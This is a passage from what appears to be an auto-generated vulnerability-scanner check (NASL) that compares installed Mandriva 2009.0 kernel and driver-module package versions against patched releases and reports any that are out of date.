}\n\n if ((res = isrpmvuln(pkg:\"alsa_raoppcm-kernel-2.6.27.56-server-1mnb\", rpm:\"alsa_raoppcm-kernel-2.6.27.56-server-1mnb~0.5.1~2mdv2008.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"alsa_raoppcm-kernel-desktop586-latest\", rpm:\"alsa_raoppcm-kernel-desktop586-latest~0.5.1~1.20101216.2mdv2008.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"alsa_raoppcm-kernel-desktop-latest\", rpm:\"alsa_raoppcm-kernel-desktop-latest~0.5.1~1.20101216.2mdv2008.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"alsa_raoppcm-kernel-server-latest\", rpm:\"alsa_raoppcm-kernel-server-latest~0.5.1~1.20101216.2mdv2008.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drm-experimental-kernel\", rpm:\"drm-experimental-kernel~2.6.27.56~desktop~1mnb~2.3.0~2.20080912.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drm-experimental-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"drm-experimental-kernel-2.6.27.56-desktop586-1mnb~2.3.0~2.20080912.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drm-experimental-kernel-2.6.27.56-server-1mnb\", rpm:\"drm-experimental-kernel-2.6.27.56-server-1mnb~2.3.0~2.20080912.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drm-experimental-kernel-desktop586-latest\", rpm:\"drm-experimental-kernel-desktop586-latest~2.3.0~1.20101216.2.20080912.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drm-experimental-kernel-desktop-latest\", rpm:\"drm-experimental-kernel-desktop-latest~2.3.0~1.20101216.2.20080912.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"drm-experimental-kernel-server-latest\", rpm:\"drm-experimental-kernel-server-latest~2.3.0~1.20101216.2.20080912.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"et131x-kernel\", rpm:\"et131x-kernel~2.6.27.56~desktop~1mnb~1.2.3~7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"et131x-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"et131x-kernel-2.6.27.56-desktop586-1mnb~1.2.3~7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"et131x-kernel-2.6.27.56-server-1mnb\", rpm:\"et131x-kernel-2.6.27.56-server-1mnb~1.2.3~7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"et131x-kernel-desktop586-latest\", rpm:\"et131x-kernel-desktop586-latest~1.2.3~1.20101216.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"et131x-kernel-desktop-latest\", rpm:\"et131x-kernel-desktop-latest~1.2.3~1.20101216.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"et131x-kernel-server-latest\", rpm:\"et131x-kernel-server-latest~1.2.3~1.20101216.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fcpci-kernel\", rpm:\"fcpci-kernel~2.6.27.56~desktop~1mnb~3.11.07~7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fcpci-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"fcpci-kernel-2.6.27.56-desktop586-1mnb~3.11.07~7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fcpci-kernel-2.6.27.56-server-1mnb\", rpm:\"fcpci-kernel-2.6.27.56-server-1mnb~3.11.07~7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fcpci-kernel-desktop586-latest\", rpm:\"fcpci-kernel-desktop586-latest~3.11.07~1.20101216.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fcpci-kernel-desktop-latest\", rpm:\"fcpci-kernel-desktop-latest~3.11.07~1.20101216.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fcpci-kernel-server-latest\", rpm:\"fcpci-kernel-server-latest~3.11.07~1.20101216.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fglrx-kernel\", rpm:\"fglrx-kernel~2.6.27.56~desktop~1mnb~8.522~3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fglrx-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"fglrx-kernel-2.6.27.56-desktop586-1mnb~8.522~3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fglrx-kernel-2.6.27.56-server-1mnb\", rpm:\"fglrx-kernel-2.6.27.56-server-1mnb~8.522~3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fglrx-kernel-desktop586-latest\", rpm:\"fglrx-kernel-desktop586-latest~8.522~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fglrx-kernel-desktop-latest\", rpm:\"fglrx-kernel-desktop-latest~8.522~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fglrx-kernel-server-latest\", rpm:\"fglrx-kernel-server-latest~8.522~1.20101216.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnbd-kernel-2.6.27.56-desktop-1mnb\", rpm:\"gnbd-kernel-2.6.27.56-desktop-1mnb~2.03.07~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnbd-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"gnbd-kernel-2.6.27.56-desktop586-1mnb~2.03.07~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnbd-kernel\", rpm:\"gnbd-kernel~2.6.27.56~server~1mnb~2.03.07~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnbd-kernel-desktop586-latest\", rpm:\"gnbd-kernel-desktop586-latest~2.03.07~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnbd-kernel-desktop-latest\", rpm:\"gnbd-kernel-desktop-latest~2.03.07~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnbd-kernel-server-latest\", rpm:\"gnbd-kernel-server-latest~2.03.07~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hcfpcimodem-kernel\", rpm:\"hcfpcimodem-kernel~2.6.27.56~desktop~1mnb~1.17~1.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hcfpcimodem-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"hcfpcimodem-kernel-2.6.27.56-desktop586-1mnb~1.17~1.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hcfpcimodem-kernel-2.6.27.56-server-1mnb\", rpm:\"hcfpcimodem-kernel-2.6.27.56-server-1mnb~1.17~1.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hcfpcimodem-kernel-desktop586-latest\", rpm:\"hcfpcimodem-kernel-desktop586-latest~1.17~1.20101216.1.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hcfpcimodem-kernel-desktop-latest\", rpm:\"hcfpcimodem-kernel-desktop-latest~1.17~1.20101216.1.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hcfpcimodem-kernel-server-latest\", rpm:\"hcfpcimodem-kernel-server-latest~1.17~1.20101216.1.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hsfmodem-kernel\", rpm:\"hsfmodem-kernel~2.6.27.56~desktop~1mnb~7.68.00.13~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hsfmodem-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"hsfmodem-kernel-2.6.27.56-desktop586-1mnb~7.68.00.13~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hsfmodem-kernel-2.6.27.56-server-1mnb\", rpm:\"hsfmodem-kernel-2.6.27.56-server-1mnb~7.68.00.13~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hsfmodem-kernel-desktop586-latest\", rpm:\"hsfmodem-kernel-desktop586-latest~7.68.00.13~1.20101216.1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hsfmodem-kernel-desktop-latest\", rpm:\"hsfmodem-kernel-desktop-latest~7.68.00.13~1.20101216.1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hsfmodem-kernel-server-latest\", rpm:\"hsfmodem-kernel-server-latest~7.68.00.13~1.20101216.1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hso-kernel\", rpm:\"hso-kernel~2.6.27.56~desktop~1mnb~1.2~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hso-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"hso-kernel-2.6.27.56-desktop586-1mnb~1.2~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hso-kernel-2.6.27.56-server-1mnb\", rpm:\"hso-kernel-2.6.27.56-server-1mnb~1.2~2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hso-kernel-desktop586-latest\", rpm:\"hso-kernel-desktop586-latest~1.2~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hso-kernel-desktop-latest\", rpm:\"hso-kernel-desktop-latest~1.2~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"hso-kernel-server-latest\", rpm:\"hso-kernel-server-latest~1.2~1.20101216.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"iscsitarget-kernel\", rpm:\"iscsitarget-kernel~2.6.27.56~desktop~1mnb~0.4.16~4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"iscsitarget-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"iscsitarget-kernel-2.6.27.56-desktop586-1mnb~0.4.16~4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"iscsitarget-kernel-2.6.27.56-server-1mnb\", rpm:\"iscsitarget-kernel-2.6.27.56-server-1mnb~0.4.16~4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"iscsitarget-kernel-desktop586-latest\", rpm:\"iscsitarget-kernel-desktop586-latest~0.4.16~1.20101216.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"iscsitarget-kernel-desktop-latest\", rpm:\"iscsitarget-kernel-desktop-latest~0.4.16~1.20101216.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"iscsitarget-kernel-server-latest\", rpm:\"iscsitarget-kernel-server-latest~0.4.16~1.20101216.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop586\", rpm:\"kernel-desktop586~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop586-devel\", rpm:\"kernel-desktop586-devel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop586-devel-latest\", rpm:\"kernel-desktop586-devel-latest~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop586-latest\", rpm:\"kernel-desktop586-latest~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel-latest\", rpm:\"kernel-desktop-devel-latest~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-latest\", rpm:\"kernel-desktop-latest~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-server\", rpm:\"kernel-server~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-server-devel\", rpm:\"kernel-server-devel~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-server-devel-latest\", rpm:\"kernel-server-devel-latest~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-server-latest\", rpm:\"kernel-server-latest~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.27.56~1mnb~1~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-latest\", rpm:\"kernel-source-latest~2.6.27.56~1mnb2\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kqemu-kernel\", rpm:\"kqemu-kernel~2.6.27.56~desktop~1mnb~1.4.0pre1~0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kqemu-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"kqemu-kernel-2.6.27.56-desktop586-1mnb~1.4.0pre1~0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kqemu-kernel-2.6.27.56-server-1mnb\", rpm:\"kqemu-kernel-2.6.27.56-server-1mnb~1.4.0pre1~0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kqemu-kernel-desktop586-latest\", rpm:\"kqemu-kernel-desktop586-latest~1.4.0pre1~1.20101216.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kqemu-kernel-desktop-latest\", rpm:\"kqemu-kernel-desktop-latest~1.4.0pre1~1.20101216.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kqemu-kernel-server-latest\", rpm:\"kqemu-kernel-server-latest~1.4.0pre1~1.20101216.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lirc-kernel\", rpm:\"lirc-kernel~2.6.27.56~desktop~1mnb~0.8.3~4.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lirc-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"lirc-kernel-2.6.27.56-desktop586-1mnb~0.8.3~4.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lirc-kernel-2.6.27.56-server-1mnb\", rpm:\"lirc-kernel-2.6.27.56-server-1mnb~0.8.3~4.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lirc-kernel-desktop586-latest\", rpm:\"lirc-kernel-desktop586-latest~0.8.3~1.20101216.4.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lirc-kernel-desktop-latest\", rpm:\"lirc-kernel-desktop-latest~0.8.3~1.20101216.4.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lirc-kernel-server-latest\", rpm:\"lirc-kernel-server-latest~0.8.3~1.20101216.4.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lzma-kernel\", rpm:\"lzma-kernel~2.6.27.56~desktop~1mnb~4.43~24mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lzma-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"lzma-kernel-2.6.27.56-desktop586-1mnb~4.43~24mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lzma-kernel-2.6.27.56-server-1mnb\", rpm:\"lzma-kernel-2.6.27.56-server-1mnb~4.43~24mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lzma-kernel-desktop586-latest\", rpm:\"lzma-kernel-desktop586-latest~4.43~1.20101216.24mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lzma-kernel-desktop-latest\", rpm:\"lzma-kernel-desktop-latest~4.43~1.20101216.24mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lzma-kernel-server-latest\", rpm:\"lzma-kernel-server-latest~4.43~1.20101216.24mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"madwifi-kernel\", rpm:\"madwifi-kernel~2.6.27.56~desktop~1mnb~0.9.4~3.r3835mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"madwifi-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"madwifi-kernel-2.6.27.56-desktop586-1mnb~0.9.4~3.r3835mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"madwifi-kernel-2.6.27.56-server-1mnb\", rpm:\"madwifi-kernel-2.6.27.56-server-1mnb~0.9.4~3.r3835mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"madwifi-kernel-desktop586-latest\", rpm:\"madwifi-kernel-desktop586-latest~0.9.4~1.20101216.3.r3835mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"madwifi-kernel-desktop-latest\", rpm:\"madwifi-kernel-desktop-latest~0.9.4~1.20101216.3.r3835mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"madwifi-kernel-server-latest\", rpm:\"madwifi-kernel-server-latest~0.9.4~1.20101216.3.r3835mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia173-kernel\", rpm:\"nvidia173-kernel~2.6.27.56~desktop~1mnb~173.14.12~4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia173-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia173-kernel-2.6.27.56-desktop586-1mnb~173.14.12~4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia173-kernel-desktop586-latest\", rpm:\"nvidia173-kernel-desktop586-latest~173.14.12~1.20101216.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia173-kernel-desktop-latest\", rpm:\"nvidia173-kernel-desktop-latest~173.14.12~1.20101216.4mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia71xx-kernel\", rpm:\"nvidia71xx-kernel~2.6.27.56~desktop~1mnb~71.86.06~5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia71xx-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia71xx-kernel-2.6.27.56-desktop586-1mnb~71.86.06~5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia71xx-kernel-2.6.27.56-server-1mnb\", rpm:\"nvidia71xx-kernel-2.6.27.56-server-1mnb~71.86.06~5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia71xx-kernel-desktop586-latest\", rpm:\"nvidia71xx-kernel-desktop586-latest~71.86.06~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia71xx-kernel-desktop-latest\", rpm:\"nvidia71xx-kernel-desktop-latest~71.86.06~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia71xx-kernel-server-latest\", rpm:\"nvidia71xx-kernel-server-latest~71.86.06~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel\", rpm:\"nvidia96xx-kernel~2.6.27.56~desktop~1mnb~96.43.07~5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel-2.6.27.56-desktop586-1mnb\", rpm:\"nvidia96xx-kernel-2.6.27.56-desktop586-1mnb~96.43.07~5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel-2.6.27.56-server-1mnb\", rpm:\"nvidia96xx-kernel-2.6.27.56-server-1mnb~96.43.07~5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel-desktop586-latest\", rpm:\"nvidia96xx-kernel-desktop586-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel-desktop-latest\", rpm:\"nvidia96xx-kernel-desktop-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nvidia96xx-kernel-server-latest\", rpm:\"nvidia96xx-kernel-server-latest~96.43.07~1.20101216.5mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n 